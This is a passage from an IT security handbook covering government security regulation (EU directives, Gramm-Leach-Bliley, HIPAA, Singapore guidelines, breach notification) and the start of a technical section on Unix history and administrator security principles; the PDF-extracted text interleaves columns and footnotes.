European Union by the judge and by the defense. in 2002 adopted a directive on privacy in the communi- · In criminal investigations, all those who have been cations sphere that permits but does not require mem- the subject of interception should be notified after ber countries to adopt data retention requirements.183 the investigation concludes, whether or not charges results. Anonymity · Personal redress is provided for violations of the privacy standards. The Council of Europe Convention on Cybercrime also recognizes another important privacy right: the legitimacy Many of the same provisions are also applicable to of anonymous communications. The Explanatory Report search and seizure orders for computer data. makes it clear that the convention does not impose on service providers any obligation to keep records of their Data Retention and Other Government Design subscribers. Thus, under the Convention, a service Mandates provider would not be required to register identity infor- mation of users of prepaid cards for telephone service, A number of developed countries (including the United nor is it obliged to verify the identity of subscribers or to States) have imposed design mandates on telephone resist the use of pseudonyms by users of it services.184 common carriers (and, in some countries, ISPs), requir- In 2003, the Council of Europe issued a Declaration on ing that communications networks be designed to sup- Freedom of Communication on the Internet in which it port government surveillance. In addition, some coun- expressly stated, "In order to...enhance the free expres- tries have adopted, or are debating the adoption of, sion of information and ideas, member states should laws requiring service providers to retain traffic data on respect the will of users not to disclose their identity."185 all communications for a specified period of time (a Likewise, the European Commission, in its 2001 mandate referred to as "data retention"). These man- Communication on Creating a Safer Information Society, dates have been very controversial and have been criti- recognized the value of anonymity, stating, "An increas- cized for threatening the privacy of citizens and the ing variety of authentication mechanisms is required to security of networks and for imposing considerable costs meet our different needs in the environments in which on service providers. A fuller consideration of design we interact. In some environments, we may need or wish 182Articles 20 and 21 of the Council of Europe convention specifically state that the real-time interception laws required under the convention shall empower competent authorities to "compel a service provider, within its existing technical capability," to collect or record, or to co-operate and assist the competent authorities in the collection or recording of, traffic data and communications content. The Explanatory Report states: "The article does not obli- gate service providers to ensure that they have the technical capability to undertake collections, recordings, co-operation or assistance. It does not require them to acquire or develop new equipment, hire expert support or engage in costly re-configuration of their systems." Para. 221. 183Directive 2002/58/EC of the European Parliament and of the Council of 12 July 2002 concerning the processing of personal data and the protection of pri- vacy in the electronic communications sector (Directive on privacy and electronic communications), Article 4(1), Official Journal L 201/37, July 31, 2002, at 37-47 (replacing EU Directive 97/66/EC), http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=en&numdoc=32002L0058&model=guichett. Also available at http://europa.eu.int/comm/internal_market/privacy/law_en.htm. 184Convention, Para. 181. 185Declaration on freedom of communication on the Internet (Strasbourg, 28.05.2003) (Adopted by the Committee of Ministers at the 840th meeting of the Ministers' Deputies) http://www.coe.int/T/E/Communication_and_Research/Press/News/2003/20030528_declaration.asp Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 183 to remain anonymous."186 Also, in its 2001 Communication Regulation and Legislation on Network and Information Security, the Commission stated, "authentication must also include the possibility In a growing number of countries, policymakers are for anonymity, as many services do not need to identify concluding that market forces alone are not sufficient the user..."187 to ensure adequate mitigation of cyber-security risks. As the European Commission has noted, action by govern- Encryption ments is required because the market offers imperfect incentives for security: market prices do not always Strong encryption is an important tool used in securing accurately reflect the costs and benefits of investment the Internet. As the European Commission noted in in security; often neither providers nor users bear all 2001, "The use of encryption technologies...[is] becoming the consequences of inaction; control over the Internet indispensable, particularly with the growth in wireless is dispersed and given the complexity of networks, it access."188 Recognizing this, the general trend in nation- may be difficult for users to assess potential dangers. al policies regarding cryptography has been to reduce or Many of the critical infrastructures heavily dependent on eliminate rules limiting the import, export, and use of computer systems have a long history of regulation in encryption. In recent years, most developed countries, the public interest ­ regulation of safety, competition, which previously sought to control encryption, have and environmental impact, among other issues. concluded that, on balance, the general availability of Increasingly, regulators are adding cyber-security to the encryption will improve security, not interfere with it. list of concerns meriting government attention. The 1997 OECD Guidelines on Cryptography Policy and a 1998 European Commission report expressed strong sup- Regulation, however, carries risks. In some respects, port for the unrestricted availability of encryption products the Internet has flourished as a relatively unregulated and services. communications medium. The global trend over the past two decades has been towards deregulation of Based on these statements, in the late 1990s Canada, communications networks generally. Competition and Germany, Ireland, and Finland announced national cryp- innovation supports development of new services and tography policies based on the OECD Guidelines, favoring technologies, drives down prices, and expands access to the free use of encryption. France, which had long communications technology. When technology is rapidly restricted encryption, reversed that policy in January changing, government regulation may hinder the adoption 1999 and announced that encryption could be used in of innovative security solutions. P France without restrictions. In December 1997, Belgium ART amended its 1994 law to eliminate the provision So a key question is: what are the best means to restricting cryptography. The United States, which had achieve the desired results of improved computer security? sought to limit use of encryption by limiting trade in By and large, as a fundamental principle, government cryptographic products and services, lifted almost all should not impose technology mandates on private FOUR restrictions on the export of encryption in 2000.189 sector operators of critical infrastructures. There is widespread recognition that technology mandates are likely to be ineffective and even counterproductive. 186European Commission, Communication from the Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee on the Regions - Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime, Jan. 26, 2001, COM(20000) 890 final: http://europa.eu.int/ISPO/eif/InternetPoliciesSite/Crime/CrimeCommEN.html. 187European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM (2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm. 188European Commission, Communication from the Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee on the Regions - Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime, Jan. 26, 2001, COM(20000) 890 final, http://europa.eu.int/ISPO/eif/InternetPoliciesSite/Crime/CrimeCommEN.html. 189See "Cryptography and Liberty 2000: An International Survey of Encryption Policy," Electronic Privacy Information Center, http://www2.epic.org/reports/crypto2000; see also "Commercial Encryption Export Controls," Bureau of Industry and Security, U. S. Dep't of Commerce, http://www.bxa.doc.gov/Encryption/Default.htm. 184 INFORMATION SECURITY AND GOVERNMENT POLICIES Instead, one approach is to impose a general requirement The European Union has issued a somewhat more to protect security. This approach was taken in Europe, detailed directive specifically addressing obligations growing out of the concept of privacy protection, where a regarding the protection of information in the electronic general duty to protect security is imposed on all entities communications industry.191 Article 4 specifies that a that collect or process personally identifiable data. provider of electronic communications service providers Another approach is to focus only on certain economic must take steps to safeguard the security of "its servic- sectors. The United States for example, in imposing priva- es, as opposed to personal data, if necessary in con- cy obligations on the financial services and health care junction with the provider of the public communications industries, also imposed a requirement for companies in network with respect to network security." Second, those sectors to protect the security of personal data. providers of publicly available electronic communica- Singapore has also focused on the financial services sec- tions must inform subscribers of a particular risk of tor, but not in the context off privacy protection ­ a breach of security, and "where the risk lies outside Singapore's e-security guidelines for financial services the scope of the measures to be taken by the service firms grow directly out of security concerns, not privacy provider, of any possible remedies, including an concerns. There are also different approaches to translat- indication of the likely costs involved."192 ing a general security requirement into specific security steps. One approach for government cyber-security regula- How should these general requirements be translated tion is to address processes, not technologies. Another into practice? Singapore offers one model, where the approach is to develop guidelines. These approaches can Monetary Authority of Singapore (MAS) has spelled out be complimentary. a comprehensive set of cyber-security recommendations in its Technology Risk Management Guidelines for Europe has started by imposing security obligations on Financial Institutions.193 The guidelines are aimed at all entities that collect and process personal informa- promoting sound processes in managing technology tion. Article 17 of the EU Data Protection Directive risks and the implementation of security practices, requires that controllers of personal information take but they are not mandatory. Instead, as the guidelines "appropriate technical and organizational measures to state, "MAS intends to incorporate these guidelines protect personal data against accidental or unlawful into supervisory expectations for the purpose of assess- destruction or accidental loss, alteration, unauthorized ing the adequacy of technology risk controls and security disclosure or access, in particular where the processing measures adopted by financial institutions. Each institu- involves the transmission of data over a network, and tion can expect that MAS will take a keen interest as to against all other unlawful forms of processing."190 The how and what extent it has achieved compliance with Directive further states "such measures shall ensure a these guidelines...Financial institutions are encouraged level of security appropriate to the risks represented by to use their best endeavors to ensure compliance with the processing and the nature of the data to be these guidelines."194 The guidelines are careful to state processed." Canada takes a similar approach, requiring that they do not affect and should not be regarded as a in general terms under its Personal Information statement of the standard of care that institutions owe Protection and Electronic Documents Act that private to their customers.195 An appendix lists security prac- sector companies take security measures to protect tices for financial institutions, stating that financial personal information they hold. institutions "should" adopt the practices. 190Directive 95/46/EC of the European Parliament and of the Council of 24 October 1995 on the protection of individuals with regard to the processing of per- sonal data and on the free movement of such data, Official Journal L 281/31, Nov. 23, 1995, http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=EN&numdoc=31995L0046&model=guichett. 191Directive 2002/58/EC of the European Parliament and of the Council of 12 July 2002 concerning the processing of personal data and the protection of pri- vacy in the electronic communications sector, Article 4(1), Official Journal L 201/37, July 31, 2002, at 37-47, http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=en&numdoc=32002L0058&model=guichett. Also available at http://europa.eu.int/comm/internal_market/privacy/law_en.htm. 192Id. at Article 4(2). 193Technology Risk Management Guidelines for Financial Institutions, Monetary Authority of Singapore, Draft Nov. 11, 2002, http://www.mas.gov.sg/display.cfm?id=94D063CD-5EB6-4636-82B5A725F9F6E9F5 194TId., para. 7.0.1, p. 11. 195Id. at p. 25. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 185 The practices include the following guidelines: ·Identify reasonably foreseeable internal and external threats that could result in unauthorized disclosure, ·Systems software and firewalls should be configured misuse, alteration, or destruction of customer infor- to the highest security settings consistent with the mation or customer information systems; level of protection required, keeping abreast of enhancements, updates and patches recommended ·Assess the likelihood and potential damage of these by system vendors; threats, taking into consideration the sensitivity of customer information; and ·All default passwords for new systems should be changed immediately upon installation as they are ·Assess the sufficiency of policies, procedures, cus- mostly known by intruders at large; tomer information systems, and other arrangements in place to control risk.199 ·Firewalls should be installed between internal and external networks as well as between geographically Information security programs must be designed to control separate sites; and risks, commensurate with the sensitivity of the information and the complexity and scope of activities. The regula- ·Anti-virus software should be implemented.196 tions require that certain fairly broad categories of security measures must be considered and, The United States has taken a different approach, focusing if appropriate, adopted: on processes, not technological practices. Thus, the Financial Services Modernization Act of 1999 (known ·access controls on customer information systems popularly by its lead sponsors in the Congress as the (authentication and authorization); Gramm-Leach-Bliley Act) recognized that "each financial ·access restrictions at physical locations; institution has an affirmative and continuing obligation ·encryption of electronic customer information; to respect the privacy of its customers and to protect the ·change management procedures; security and confidentiality of those customers' nonpublic ·dual control procedures (segregation of duties and personal information."197 Under the Act, regulators of background checks) for employees with access to financial institution were required to issue regulations for customer information; administrative, technical, and physical safeguards for ·intrusion monitoring systems; information security.198 The crucial point is this: the regu- ·intrusion response programs; and P lations that were issued do not say what the technical ·measures to protect against destruction, loss, or ART components of a safeguards program must be. Instead damage of customer information. the regulations leave it up to the businesses to decide what specific security measures are best for them. Additionally, under the regulations, staff must be trained in the implementation of the security program. FOUR Under the Act, the rules issued by the regulatory agencies Regular testing of the key controls, systems, and proce- for the financial services industry require banks to adopt dures must take place, with appropriate adjustments security plans. The rules do not state what technical made to account for relevant changes in technology, measures those plans must contain. The security the sensitivity of customer information, internal or program must: external threats to information, and changing business 196Id., Appendix C, p. 21. For further information on financial security, see Thomas Glaessner, Tom Kellermann, and Valerie McNevin, Electronic Security: Risk Mitigation in Financial Transactions--Public Policy Issues, The World Bank, June 2002, http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/(attachmentweb)/E-security-RiskMitigationversion3/$FILE/E-security-Risk+Mitigation+ver- sion+3.pdf; Thomas Glaessner, Tom Kellermann, and Valerie McNevin, Electronic Security: Risk Mitigation in Financial Transactions--Summary of Recent Research and Global Dialogues, The World Bank, May 2003, http://www.worldbank.org/wbi/B-SPAN/sub_e-security.htm 197Gramm-Leach Bliley Act, Title 15, United States Code, section 6801. 198Gramm-Leach Bliley Act, Title 15, United States Code, section 6805. 199"Appendix B to Part 570--Interagency Guidelines Establishing Standards for Safeguarding Customer Information," Part III, http://www.occ.treas.gov/fr/fedregister/66fr8616.htm. 200Id. 186 INFORMATION SECURITY AND GOVERNMENT POLICIES arrangements, such as mergers and acquisitions, "implementation specifications."204 It states that security alliances and joint ventures, outsourcing arrangements200 practices should take into account technical capabilities The rules also require the Boards of Directors of financial of record systems, costs of security measures, the need institutions to approve their institutions' written securi- for personnel training, and the value of audit trails in ty programs and oversee the development, implementa- computerized record systems. The security rule identifies tion, and maintenance of the program, including assign- safeguards that are "required" and those that are ing specific responsibility for implementation and "addressable." reviewing reports from management. The core principles of the Security Rule require covered Similar rules issued by the Federal Trade Commission entities to: require that financial institutions under its purview must develop a plan in which the institution must: ·Ensure the confidentiality, integrity, and (1) designate one or more employees to coordinate the availability of all electronic protected health safeguards; information the covered entity creates, receives, (2) identify and assess the risks to customers information maintains, or transmits. in each relevant area of the company's operation, and evaluate the effectiveness of the ·Protect against any reasonably anticipated threats current safeguards for controlling these risks; or hazards to the security or integrity of such (3) design and implement a safeguards program, and information. regularly monitor and test it; (4) select appropriate service providers and contract ·Protect against any reasonably anticipated uses or with them to implement safeguards; and disclosures of such information that are not required (5) evaluate and adjust the program in light of relevant under the Security Rule. circumstances, including changes in the firms business arrangements or operations, or the results ·Ensure compliance with the Security Rule by its of testing and monitoring of safeguards.201 workforce.205 A similar approach can be seen in the United States' The Rule, however, allows flexibility: Health Insurance Portability and Accountability Act of 1996 (HIPAA), which requires healthcare institutions to · Covered entities may use any security measures that institute security measures to ensure patient information allow the covered entity to reasonably and appropri- that is stored electronically remains confidential and ately implement the standards and implementation free from unauthorized access. The security rule adopted specifications. under the Act requires the maintenance of reasonable and appropriate administrative, physical, and technical · In deciding which security measures to use, a covered safeguards to protect the integrity and confidentiality entity must take into account the following factors: of personal medical information and to protect against reasonably anticipated threats or hazards to the security (i) The size, complexity, and capabilities of or integrity of medical data or its unauthorized use or the covered entity. disclosure.203 The rule applies to data both while in (ii) The covered entity's technical infrastructure, storage and in transit. It has 28 "standards" and 41 hardware, and software security capabilities. 201See "Financial Institutions and Customer Data: Complying with the Safeguards Rule," http://www.ftc.gov/bcp/conline/pubs/buspubs/safeguards.htm; see also Standards for Safeguarding Customer Information, 67 Fed. Reg. 36484-94, May 23, 2000, (codified at 16 Code of Federal Regulations Part 314), http://www.ftc.gov/os/2002/05/67fr36585.pdf. 20245 Code of Federal Regulations sections 160, 162, 164; http://www.cms.hhs.gov/hipaa/hipaa2/regulations/security/default.asp 203See HIPAA, Title 42, United States Code section 1320d-2(d)(2). 204Linda A. Malek and Brian R. Krex, "HIPAA's security rule becomes effective 2005," The National Law Journal, Mar. 31, 2003 at B14. 20545 Code of Federal Regulations Section 164.306(a).. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 187 (iii) The costs of security measures. (iv) The probability and criticality of potential risks to electronic protected health information.206 Another approach is to require companies to publicly disclose vulnerabilities and breaches, both in order to inform the public and to prompt system operators to improve security. EU law obligates the providers of publicly available telecommunications services to inform their subscribers of particular risks of a breach of security of the network and any possible remedies, including the costs involved. For example, in the State of California, a law took effect on July 1, 2003 requiring any company that owns, licenses, or maintains personal information of California residents to notify those residents if a security breach enables an unauthorized person to gain access to the residents' personal information.207 P ART FOUR 20645 Code of Federal Regulations Section 164.306(b). 207Security Breach Information Act (SB 1386), added to the California Civil Code as Section 1798.29; Thomas J. Smedinghoff, Cybersecurity Disclosure Requirements: A New Trend?" Baker & McKenzie, Chicago (October 3, 2003), http://www.bmck.com/ecommerce/cybersecurity-disclosure-requirements.pdf. 189 PA R T F I V E I T S E C U R I T Y F O R T E C H N I C A L A D M I N I S T R A T O R S CHAPTER 1. BACKGROUND CHAPTER 2. SECURITY FOR ADMINISTRATORS CHAPTER 3. PHYSICAL SECURITY CHAPTER 4. INFORMATION SECURITY CHAPTER 5. IDENTIFICATION AND AUTHENTICATION CHAPTER 6. SERVER SECURITY CHAPTER 7. NETWORK SECURITY CHAPTER 8. ATTACKS AND DEFENSES CHAPTER 9. DETECTING AND MANAGING A BREAK-IN CHAPTER 10. SYSTEM-SPECIFIC GUIDELINES 190 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 1. BACKGROUND Summary of Parts 1-4 As we turn to the most technical Part of the Handbook, it will be useful to review what we have already discussed in Parts 1-4. As you will recall, Part 1 of this publication provided an introduction to the general issues of security in an electronic age. The section described the scope of IT security issues, explained some types of malicious behavior with respect to computers and networks, and outlined why security policies and procedures are essential for individuals and enterprises or all types. Part 2 addressed the common concerns of individual users of computing and networking resources. It explained the key security issues that pertain to individual users and offered guidelines on techniques that, when properly employed, will minimize the threat of a security penetration. Part 3 covered the administrative and policy aspects of security from an organizational point of view. Through opportunities presented by the new digital media, small and medium-sized enterprises (SMEs) in developing countries are moving into position to compete on a level playing field in the current expansion of the global markets. Good security policy and effective implementation of security procedures will minimize the risk of accidental and deliberate losses and provide the tools to identify attacks and to repair security breaches. In the SME context, security policy should also include elements such as an authentication policy for users of interactive application areas such as e-business, e-commerce, and e-government. This part makes suggestions on how solid security policies may be developed and deployed in a range of organizational environments. Part 4 focuses on security issues and legislative initiatives that need to be understood and handled at the governmental level. In addition to securing its own information assets, a government has an obligation to set policy for securing and protecting the national information infrastructure. Governments also need to envision how the growth of the information infrastructure will impact its legal system. Part 4 outlines some of the key questions facing policy makers and leaders in the developing world and offers examples of policies from the international community that may serve as guidance for those people engaged with new regulatory efforts concerning cyberspace. Summary of Part 5 with Note on Technical Background Part 5 is aimed at helping system and network administrators perform their duties efficiently. It provides detailed information on security issues that need to be understood and addressed at a highly technical, including: · classifying specific threats to security, including methods of attack that are used to penetrate systems and programs; · monitoring critical systems and network traffic so that attempted intrusions can be detected and, when possible, rejected; · assessing the results of security evaluations while policies and procedures are being developed and analyzing the results of logs and other ongoing documentation once those security measures have been implemented. · handling a break-in, recovering from the security breach, and learning from the experience Part 5 differs from the other four Parts of this Handbook in that it assumes a certain level of technical knowledge on behalf of the reader. While concepts have been explained clearly and examples given whenever possible, this section is designed for people with a fair amount of experience with (or at least very strong interest in) systems Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 191 and their administration. There is a great deal of material to cover in this section and readers are strongly encouraged to make use of the Annexes which point to many respected references in the field of computer and network maintenance. Since security issues often depend upon the operating environment of the computer, Part 5 provides subsections that address well-known security issues associated with the major operating systems in use today. Though the majority of Part 5 is system-independent whenever possible, pointers are offered on Microsoft Windows NT-based operating systems and Unix, Linux, MacOS X, and other variations of desktop Unix. In all cases, there are clear recommendations regarding the actions that can and should be taken to avoid compromise of system resources. UNIX There are several different (sometimes quite different) Unix or Unix-like operating systems, distributed by many different vendors. The reasons for this, and its implications, require a brief historical review. The roots of Unix go back to the Multics project of the mid-1960s. The project, heavily funded by the U.S. Department of Defense Advanced Research Projects Agency (ARPA or DARPA) was designed to be a modular system built from banks of high-speed processors, memory, and communications equipment. By design, parts of the computer could be shut down for service without affecting other parts or the users. Although this level of processing is simply assumed today, such a capability was not available when Multics was begun. Multics was designed both to be resistant to external attacks and to protect the users on the system from each other ­ Multics was to support the concept of multilevel security. Multics eventually provided a level of security and service that is still unequaled by many of today's computer systems. Whereas Multics tried to do many things, Unix tried to do one thing well: run programs. Strong security was not part of this goal. The system was based on compact programs, called tools, each of which performed a single function. American Telephone and Telegraph (AT&T) added tools and features throughout the 1970's. In 1973, Thompson rewrote most of Unix in Ritchie's newly invented C programming language. C was designed to be a simple, portable language. Programs written in C could be moved easily from one kind of computer to another--as was the case with programs written in other high-level languages like FORTRAN--yet they ran nearly as fast as programs coded directly in a computer's native machine language. By 1977, more than 500 sites were running the operating system; 125 sites were at universities in the United States and more than 10 foreign countries. Development continued in different locations; including the University of California at Berkeley, which released the "Berkeley Software Distribution (BSD)," a collection of programs and modifications to the Unix system. Over the next six years, in an effort funded by ARPA, the so-called BSD Unix grew into an operating system of its own that offered significant improvements over AT&T's. Perhaps the most important of the Berkeley improvements was in the area of networking, which made it easy to connect Unix computers to local area networks (LANs). For all of these reasons, the Berkeley version of Unix became very popular with the research and academic communities. As Unix started to move from the technical to the commercial markets in the late 1980s, the conflict between operating system versions based on AT&T Unix and those based on BSD was beginning to cause problems for all PART vendors. Commercial customers wanted a standard version of Unix, hoping that it could cut training costs and guarantee software portability across computers made by different vendors. And the nascent Unix applications FIVE market wanted a standard version, believing that this would make it easier for them to support multiple platforms, as well as compete with the growing PC-based market. 192 IT SECURITY FOR TECHNICAL ADMINISTRATORS In May 1988, seven of the industry's Unix leaders--Apollo Computer, Digital Equipment Corporation, Hewlett- Packard, IBM, and three major European computer manufacturers --announced the formation of the Open Software Foundation (OSF). The goal of OSF was to wrest control of Unix away from AT&T alone and put it in the hands of a not-for-profit industry coalition, which would be chartered with shepherding the future development of Unix and making it available to all under uniform licensing terms. OSF decided to base its version of Unix on IBM's implementation, then moved to the Mach kernel from Carnegie Mellon University, and an assortment of Unix libraries and utilities from HP, IBM, and Digital. Although the result of that effort was not widely adopted or embraced by all the participants, the OSF concept of generated further development activity. GNU Richard Stallman, a programmer with the MIT Artificial Intelligence Laboratory's Lisp Machine Project, was tremendously upset when the companies that were founded to commercialize the research adopted rules prohibiting the free sharing of software. Stallman realized that if he wanted to have a large community of people sharing software, he couldn't base it on specialty hardware manufactured by only a few companies and running only LISP. So instead, he decided to base a new software community on Unix, a powerful operating system that looked like it had a future. He called his project GNU, a recursive acronym meaning "GNU's Not Unix!" To Stallman, being "free" wasn't simply a measure of price, it was also a measure of freedom. Being free meant that he was free to inspect and make changes to the source code, and that he was free to share copies of the program with his friends. He wanted free software -- as in free speech, not free beer. By 1985, GNU's first major product, the Emacs text editor, had grown to the point that it could be readily used by people other than Stallman. Stallman next started working on a free C compiler, GNU C. Both of these programs were distributed under Stallman's GNU General Public License (GPL). This license gave developers the right to distribute the source code and to make their own modifications, provided that all future modifications were released in source code form and under the same license restrictions. That same year, Stallman founded the Free Software Foundation, a non-profit foundation that solicited donations and used it to hire programmers who would write freely redistributable software. Minix and Linux At roughly the same time that Stallman started the GNU project, professor Andrew S. Tanenbaum decided to create his own implementation of the Unix operating system to be used in teaching and research. As all of the code would be original, he would be free to publish the source code in his textbook and distribute working operating systems without paying royalties to AT&T. The system, Minix, ran on IBM PC AT clones equipped with the Intel-based processors and was designed around them. The project resulted in a stable, well-documented software platform and an excellent operating system textbook. However, efficiency was not a design criteria for Minix, and coupled with the copyright issues associated with the textbook, Minix did not turn out to be a good choice for widespread, everyday use. In 1991, a Finnish computer science student named Linus Torvalds decided to create a free version of the Unix operating system that would be better suited to everyday use. Starting with the Minix code set, Torvalds solely reimplemented the kernel and file system piece-by-piece until he had a new system that had none of Tanenbaum's original code in it. Torvalds named the resulting system "Linux" and decided to license and distribute it under Stallman's GPL. By combining his system with other freely available tools, notably the C compiler and editor developed by the Free Software Foundation's GNU project and the X Consortium's window server, Torvalds was able to create an entire working operating system. Work on Linux continues to this day by hundreds of contributors. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 193 NetBSD, FreeBSD, and OpenBSD In 1988 the Berkeley Computer Systems Research Group (CSRG) started on a project to eliminate all AT&T code from their operating system. First available in June 1989, Networking Release 1 consisted of Berkeley's TCP/IP implementation and the related utilities. It was distributed on tape for a cost of $1,000, although anyone who purchased it could do anything that he wanted with the code, provided that the original copyright notice was preserved. Several large sites put the code up for anonymous FTP; the Berkeley code rapidly became the base of many TCP/IP implementations throughout the industry. An interim release named 4.3BSD-Reno occurred in early 1990; a second interim release, Networking Release 2, occurred in June 1991. This system was a complete operating system except for six remaining files in the kernel that contained AT&T code and had thus not been included in the operating system. In the fall of 1991, Bill Jolitz wrote those files for the Intel processor and created a working operating system called 386/BSD. Within a few months a group of volunteers committed to maintaining and expanding the system formed and christened their effort "NetBSD." The NetBSD project soon splintered. Some of the members decided that the project's primary goal should support as many different platforms as possible and to continue to do operating system research. But another group of developers thought that they should devote their resources to making the system run as well as possible on the Intel 386 platform and making the system easier to use. This second group split off from the first and started the FreeBSD project. A few years later, a second splinter group broke off from the NetBSD project. This group decided that security and reliability were not getting the attention they should. The focus of this group was on careful review of the source code to identify potential problems. They restricted adoption of new code and drivers until they had been thoroughly vetted for quality. This third group adopted the name "OpenBSD." Businesses Adopt Unix As a result of monopolistic pricing on the part of Microsoft and the security and elegance of the Unix operating systems, many businesses have developed a renewed interest in adopting a Unix base for some commercial products. A number of network appliance vendors found the stability and security of the OpenBSD platform to be appealing, and they adopted it for their projects. Other commercial users, especially many early web hosting firms, found the stability and support options offered by BSDI to be attractive, and they adopted BSD/OS. Several universities also adopted BSD/OS because of favorable licensing terms for students and faculty when coupled with the support options. Meanwhile, Linux became extremely popular among individuals seeking an alternative OS for their PCs. Although OpenBSD was likely a more secure and stable operating system at the time, Linux provided support for a much larger base of hardware, and was somewhat easier to install and operate. Another key influence in the mid-to-late 1990s occurred when researchers at various national laboratories, universities, and NASA began to experiment with cluster computing. With cluster computing, scores (or hundreds) of commodity PCs were purchased, placed in racks, and connected with high-speed networks. Instead of running one program really fast on one computer, big problems were broken into manageable chunks that were run in PART parallel on the racked PCs. This approach, although not appropriate for all problems, often worked better than using high-end supercomputers. Furthermore, it was often several orders of magnitude less costly. One of the first working FIVE systems of this type, named Beowulf, was based on Linux. Because of the code sharing and mutual development of the supercomputing community, Linux quickly spread to other groups around the world wishing to do similar work. 194 IT SECURITY FOR TECHNICAL ADMINISTRATORS All of this interest, coupled with growing unease with Microsoft's de facto monopoly of the desktop OS market, caught the attention of two companies -- IBM and Dell -- both of which announced commercial support for Linux. Around the same time, two companies devoted to the Linux operating system -- Red Hat and VA Linux -- had two of the most successful Initial Public Offerings in the history of the US stock market. Shortly thereafter, HP announced a supported version of Linux for their systems. Today, many businesses and research laboratories run on Linux. They use Linux to run web servers, mail servers, and, to a lesser extent, as a general desktop computing platform. Instead of purchasing supercomputers, businesses create large Linux clusters that can solve large computing problems via parallel execution. FreeBSD, NetBSD, and OpenBSD are similarly well-suited to these applications, and are also widely used. However, based on anecdotal evidence, Linux appears to have a larger installed base of users than any one of the other systems. Based on announced commercial support, including ventures by Sun Microsystems, Linux seems better poised to grow in the marketplace. Nonetheless, because of issues of security and performance (at least), we do not expect the *BSD variants to fade from the scene; as long as the *BSD camps continue separate existences, however, it does seem unlikely that they will gain on Linux market share. There are several versions of the Linux and BSD operating system that will boot off a single floppy. These versions, including Trinix, PicoBSD, and ClosedBSD, are designed for applications where high security is required, including forensics, recovery, and network appliances. Security and Unix Like Windows NT-based systems, Unix is a multi-user, multi-tasking operating system. Multi-user means that the operating system allows many different people to use the same computer at the same time. Multi-tasking means that each user can run many different programs simultaneously. One of the natural functions of such operating systems is to prevent different people (or programs) using the same computer from interfering with each other. Without such protection, a wayward program could affect other programs or other users, could accidentally delete files, or could even crash (halt) the entire computer system. To keep such disasters from happening, some form of computer security has always had a place in the Unix design philosophy. Unix security provides more than mere memory protection. Unix has a sophisticated security system that controls the ways users access files, modify system databases, and use system resources. Unfortunately, those mechanisms don't help much when the systems are misconfigured, are used carelessly, or contain buggy software. Nearly all of the security holes that have been found in Unix over the years have resulted from these kinds of problems rather than from shortcomings in the intrinsic design of the system. Thus, nearly all Unix vendors believe that they can (and perhaps do) provide a reasonably secure Unix operating system. We believe that Unix systems can be fundamentally more secure than other common operating systems. However, there are influences that work against better security in the Unix environment. Expectations The biggest problem with improving Unix security is arguably one of expectations. Many users have grown to expect Unix to be configured in a particular way. Their experience with Unix in academic, hobbyist, and research settings has always been that they have access to most of the directories on the system and that they have access to most commands. Users may be accustomed to making their files world-readable by default. Users are also often accustomed to being able to build and install their own software, often requiring system privileges to do so. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 195 Unfortunately, all of these expectations are contrary to good security practice. To have stronger security, system administrators must often curtail access to files and commands that are not strictly needed for users to do their jobs. Thus, someone who needs e-mail and a text processor for his work should not also expect to be able to run the network diagnostic programs and the C compiler. Likewise, to heighten security, users should not be able to install software that has not been examined and approved by a trained and authorized individual. Administrators can strengthen security by applying some general security principles, in moderation. For instance, rather than removing all compilers and libraries from each machine, these tools can be protected so that only users in a certain user group can access them. Users with a need for such access, and who can be trusted to take due care, can be added to this group. Similar methods can be used with other classes of tools, too, such as network monitoring software or Usenet news programs. Furthermore, changing the fundamental view of data on the system (from readable by default to unreadable by default) can be beneficial. For instance, user files and directories should be protected against read access instead of being world-readable by default. Setting file access control values appropriately, and using shadow password files, are two examples of how this simple change in system configuration can improve the overall security of Unix. The most critical aspect of enhancing Unix security is to get users themselves to participate in the alteration of their expectations. Not surprisingly, this advice also applies to enhancing the security of NT-based systems when users are accustomed to Microsoft's "personal" operating systems prior to NT. The best way to meet this goal is not by decree, but through education, awareness, and motivation. Technical security measures are crucial, but experience has proven repeatedly that people problems are not amenable to technological solutions. Many users started using computers in an environment that was less threatening than the one they face today. By educating users about the dangers and how their cooperation can help to thwart those dangers, the security of the system is increased. By properly motivating users to participate in good security practice, you make them part of the security mechanism. Better education and motivation work well only when applied together, however; education without motivation may mean that security measures are not actually applied, and motivation without education leaves gaping holes in what is done. PART FIVE 196 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 2. SECURITY FOR ADMINISTRATORS At a Glance This chapter provides an operational definition of security for administrators, discusses the design of secure systems, and explains who attacks computer systems. Some typical attacker tools are enumerated, and a case study of an attack is developed. Security for Administrators As a technical administrator, you're responsible for insuring that the systems you manage do what they're supposed to do. Although there are many formal definitions of security, a useful operational definition for administrators is: A computer is secure if you can depend on it and its software to behave as you expect. If you expect the data entered into your machine today to be there in a few weeks, and to remain unread by anyone who is not supposed to read it, then the machine is secure. Security, then, is a critical function of every administrator's role. By this definition, natural disasters and buggy software are as much threats to security as unauthorized users are. Bad Code Designing secure computing systems and software isn't easy. In 1975, Jerome Saltzer and M. D. Schroeder described seven criteria for building such systems. They are: Least privilege Every user and process should have the least set of access rights necessary. Least privilege limits the damage that can be done by malicious attackers and errors alike. Access rights should be explicitly required, rather than given to users by default. Economy of mechanism The design of the system 